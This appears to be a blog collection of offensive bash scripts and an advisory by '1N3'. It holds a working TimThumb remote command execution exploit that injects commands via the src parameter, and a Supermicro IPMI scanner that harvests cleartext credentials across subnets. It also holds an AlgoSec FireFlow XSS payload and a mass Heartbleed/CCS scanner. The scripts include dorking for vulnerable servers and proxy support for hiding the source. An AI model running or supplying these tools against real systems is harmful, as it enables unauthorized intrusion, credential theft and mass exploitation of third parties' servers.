TimThumb WebShot Code Execution Exploit (0-day)

 

#!/bin/bash
# Wordpress TimThumb Remote Command Execution Exploit (0day) v20140627 by 1N3
# (c) http://treadstonesecurity.blogspot.ca
# Usage: sh timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# ABOUT:
# TimThumb’s “Webshot” feature that allows for certain commands to be executed on the
# vulnerable website remotely (no authentication required). With a simple command, an
# attacker can create, remove and modify any files on your server. Timthumb 2.8.11-2.8.13
# with the WEBSHOT_ENABLED option enabled appear to be vulnerable.
#
# USAGE:
# ./timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# NOTE: proxy and command fields are optional.
#
# EXAMPLE:
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php none rm$IFS/tmp/a.txt
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php proxy 'rm$IFS/tmp/a.txt'

# BANNER
clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Wordpress TimThumb Remote Command Execution Exploit (0day) by 1N3"
echo ""

# VARS
UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
TARGET=$1
BASE_PATH=$2
PROXY=$3
COMMAND=$4

# REQUIREMENTS
if [ "$PROXYCHAINS" == "" ]; then
    echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
    exit
fi

if [ "$CURL" == "" ]; then
    echo "(--==== Curl not installed! Exiting..."
    exit
fi

if [ -z "$TARGET" ] || [ -z "$BASE_PATH" ]; then
    echo "(--==== Usage: $0 <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]"
    exit
fi

if [ $TARGET == "google" ]; then
# USE GOOGLE HACKING TO FIND VULNERABLE SERVERS
    echo "Searching Google..."
    iceweasel 'https://www.google.com/search?q=TimThumb+version+%3A+2.8.13&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=iceweasel-a#q=inurl:%27%2Ftimthumb.php%27+filetype:php+inurl:plugins+inurl:wp-content&rls=org.mozilla:en-US:unofficial' &
    exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
    echo "(--==== Scanning via proxy..."

    if [ -z $COMMAND ]; then
        # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
        proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
        echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
    else
        # RUN CUSTOM COMMAND
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
        proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
        echo "(--==== Exploit Sent!"
    fi
    exit

else
# NO PROXY
    echo "(--==== Scanning via direct connection..."

    if [ -z $COMMAND ]; then
        # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
        curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
        echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
    else
        # RUN CUSTOM COMMAND
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
        curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
        echo "(--==== Exploit Sent!"
    fi
    exit
fi

echo ""
echo "(--==== Scan Complete!"
exit

Supermicro IPMI/BMC Cleartext Password Scanner

#!/bin/bash
# Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]
#
# ABOUT:
# Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to
# request the file PSBlock via port 49152. This plain text password file contains IPMI
# username and password information. This script allows users to scan their networks
# check for vulnerable systems that require patching.
#
# USAGE:
# ./supermicro_scan.sh 74.200.8.237 - Single host scan
# ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy
# ./supermicro_scan.sh showdan - Search for vulnerable servers on ShowdanHQ
#

clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Supermicro IPMI Cleartext Password Scanner by 1N3"
echo ""

UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
TARGET=$1
PROXY=$2

if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== Unicornscan not installed! Exiting..."
    exit
fi

if [ "$PROXYCHAINS" == "" ]; then
    echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
    exit
fi

if [ "$CURL" == "" ]; then
    echo "(--==== Curl not installed! Exiting..."
    exit
fi

if [ -z "$1" ]; then
    echo "(--==== Usage: $0 <CIDR|IP> [proxy]"
    exit
fi

if [ $TARGET == "shodan" ]; then
# SCAN USING SHODANHQ SEARCH
    echo "Searching ShowdanHQ..."
    iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &
    exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
    echo "(--==== Scanning via proxy..."
    # SCAN FOR THE DEFAULT FILES AND PORTS
    for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do
        echo "(--==== Extracting User/Pass from $a"
        echo "(--==== Sending GET http://$a:49152/PSBlock"
        proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
    done
    exit

else
# NO PROXY
    echo "(--==== Scanning via direct connection..."
    # SCAN FOR THE DEFAULT FILES AND PORTS
    for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do
        echo "(--==== Extracting User/Pass from $a"
        echo "(--==== Sending GET http://$a:49152/PSBlock"
        curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
    done
    exit

fi

echo ""
echo "(--==== Scan Complete!"
exit

AlogoSec FireFlow v6.3 XSS/HTML Injection Flaws

x---==== Exploit Title: AlogoSec FireFlow v6.3 XSS/HTML Injection Flaws
x---==== Date: Mon Jun 9 2014
x---==== Author: 1N3
x---==== Homepage: http://treadstonesecurity.blogspot.ca
x---==== Software Link: http://www.algosec.com/en/products_solutions/products/fireflow
x---==== Version: 6.3 (Other versions may also be susceptible)

x---==== Vulnerability
Form fields in the user preferences screen in AlgoSec FireFlow v6.3-b230 are vulnerable to reflective XSS and HTML injection attacks. This may allow attackers to automatically execute arbitrary javascript on behalf of other logged in users on the system by substituting XSS code in their signature.

x---==== Vulnerable URL:
https://fireflowhostname.com/FireFlow/SelfService/Prefs.html

x---==== XSS Code:
<script>alert(document.cookie)</script>

OpenSSL CCS & HeartBleed Mass Scanner

#!/bin/bash
# MassBleed OpenSSL Scanner v20140609 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]
#
# ABOUT:
# This script has four main functions with the ability to proxy all connections:
# 1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
# 2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
# 4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)
#
# PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
#
# PROXY USAGE EXAMPLES:
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
#
# VULNERABILITIES:
# 1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
# 2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
#
# REQUIREMENTS:
# Is the heartbleed POC present?
# Is the openssl CCS script present?
# Is unicornscan installed?
# Is nmap installed?

echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== MassBleed OpenSSL Scanner by 1N3"
echo ""

HEARTBLEED=`ls heartbleed.py`
OPENSSL_CCS=`ls openssl_ccs.pl`
UNICORNSCAN=`which unicornscan`
NMAP=`which nmap`
RANGE=$1
SCAN_TYPE=$2
CUSTOM_PORT=$3
PROXY=$4
PORT_RANGE="1-65000"

if [ "$HEARTBLEED" != "heartbleed.py" ]; then
    echo "(--==== heartbleed.py not found!"
    echo "(--==== To fix, download the POC by Jared Stafford (https://gist.github.com/sh1n0b1/10100394) and place in same directory named: heartbleed.py"
    exit
fi

if [ "$OPENSSL_CCS" != "openssl_ccs.pl" ]; then
    echo "(--==== openssl_ccs.pl not found!"
    echo "(--==== To fix, download the script from RedHat (https://access.redhat.com/labs/ccsinjectiontest/) and place in same directory named: openssl_ccs.pl"
    exit
fi

if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== Unicornscan not installed! Exiting..."
    exit
fi

if [ "$NMAP" == "" ]; then
    echo "(--==== Nmap not installed! Exiting..."
    exit
fi

if [ -z "$1" ]; then
    echo "(--==== Usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"
    exit
fi

if [ "$PROXY" = "proxy" ]; then
    echo "(--==== Scanning via proxy..."
    if [ "$SCAN_TYPE" = "single" ]; then
        if [ "$CUSTOM_PORT" != "0" ]; then
            echo "(--==== Checking HeartBleed: $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep vulnerable
            echo "(--==== Checking OpenSSL CCS: $RANGE:$CUSTOM_PORT" && proxychains perl openssl_ccs.pl $RANGE $CUSTOM_PORT | grep affected;
        else
            for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
                do
                    echo "(--==== Checking HeartBleed $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep vulnerable
                    echo "(--==== Checking OpenSSL CCS $RANGE:"$a && proxychains perl openssl_ccs.pl $RANGE $a | grep affected;
            done;
        fi
    fi
    if [ "$SCAN_TYPE" = "subnet" ]; then
        for a in {1..254};
        do
            echo "(--==== Scanning: $RANGE$a"
            for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "(--==== $RANGE$a:$b"
                echo "(--==== Checking HeartBleed:" && proxychains python heartbleed.py $RANGE$a -p $b | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" && proxychains perl heartbleed.py $RANGE$a $b | grep affected
            done;
        done;
    fi
    if [ "$SCAN_TYPE" = "port" ]; then
        for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && proxychains perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected
        done;
    else
        for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a && proxychains python heartbleed.py $a -p 443 | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a && proxychains perl openssl_ccs.pl $a 443 | grep affected
        done
    fi
else
    if [ "$SCAN_TYPE" = "single" ]; then
        for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
            do
                echo "(--==== Checking HeartBleed $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep vulnerable
                echo "(--==== Checking OpenSSL CCS $RANGE:"$a && perl openssl_ccs.pl $RANGE $a | grep affected
        done;
    fi
    if [ "$SCAN_TYPE" = "subnet" ]; then
        for a in {1..254};
        do
            echo "(--==== Scanning: $RANGE$a"
            for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                    echo "$RANGE$a:$b"
                    echo "(--==== Checking HeartBleed:" && python heartbleed.py $RANGE$a -p $b | grep vulnerable
                    echo "(--==== Checking OpenSSL CCS:" && perl openssl_ccs.pl $RANGE$a $b | grep affected
            done;
        done;
    fi
    if [ "$SCAN_TYPE" = "port" ]; then
        for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected
        done;
    else
        for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a && python heartbleed.py $a -p 443 | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a && perl openssl_ccs.pl $a 443 | grep affected
        done
    fi
fi

echo "(--==== Scan Complete!"
exit